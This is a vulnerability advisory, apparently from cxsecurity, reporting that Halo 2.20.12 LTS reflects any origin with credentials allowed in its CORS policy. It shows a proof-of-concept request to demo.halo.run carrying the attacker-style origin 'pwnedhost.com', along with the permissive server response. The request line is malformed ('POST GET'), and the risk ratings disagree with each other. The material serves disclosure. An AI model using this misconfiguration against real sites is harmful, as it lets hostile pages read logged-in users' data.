Halo-2.20.12 LTS CORS Vulnerability

2024.12.25
bg nu11secur1ty (BG) bg
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: Halo-2.20.12 LTS CORS Vulnerability ## Author: nu11secur1ty ## Date: 12/25/2024 ## Vendor: https://www.halo.run/ ## Software: https://github.com/halo-dev/halo ## Reference: https://portswigger.net/web-security/cors ## Description: The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin null The application allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe. STATUS: HIGH Vulnerability [+]PoC: - CORS: ```POST GET /apis/api.halo.run/v1alpha1/comments?group=content.halo.run&kind=Post&name=153c74e9-46c5-4717-b060-c977c200db77&page=1&size=20&version=v1alpha1&withReplies=false&replySize=5 HTTP/2 Host: demo.halo.run Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36 Cache-Control: max-age=0 Cookie: XSRF-TOKEN=a0dc5127-b7f7-46ab-941c-86b571611f5a; _ga_Z907HJBP8W=GS1.1.1735151014.1.0.1735151014.0.0.0; _ga=GA1.1.1240519506.1735151014 Referer: https://demo.halo.run/archives/national-security-manager Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="131", "Chromium";v="131" Sec-Ch-Ua-Platform: Windows Sec-Ch-Ua-Mobile: ?0 Origin: https://pwnedhost.com/ ``` [+]Response: ``` HTTP/2 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://pwnedhost.com/ Cache-Control: no-cache, no-store, max-age=0, must-revalidate Content-Type: application/json Expires: 0 Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Strict-Transport-Security: max-age=31536000 Vary: Origin Vary: Access-Control-Request-Method Vary: Access-Control-Request-Headers X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Xss-Protection: 0 Content-Length: 117 Date: Wed, 25 Dec 2024 21:45:57 GMT {"page":1,"size":20,"total":0,"items":[],"first":true,"last":true,"hasNext":false,"hasPrevious":false,"totalPages":0} ``` ## Reproduce: [href](https://www.patreon.com/posts/halo-2-20-12-lts-118678773) ## Info: [href](https://www.nu11secur1ty.com/) ## Time spent: 01:07:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top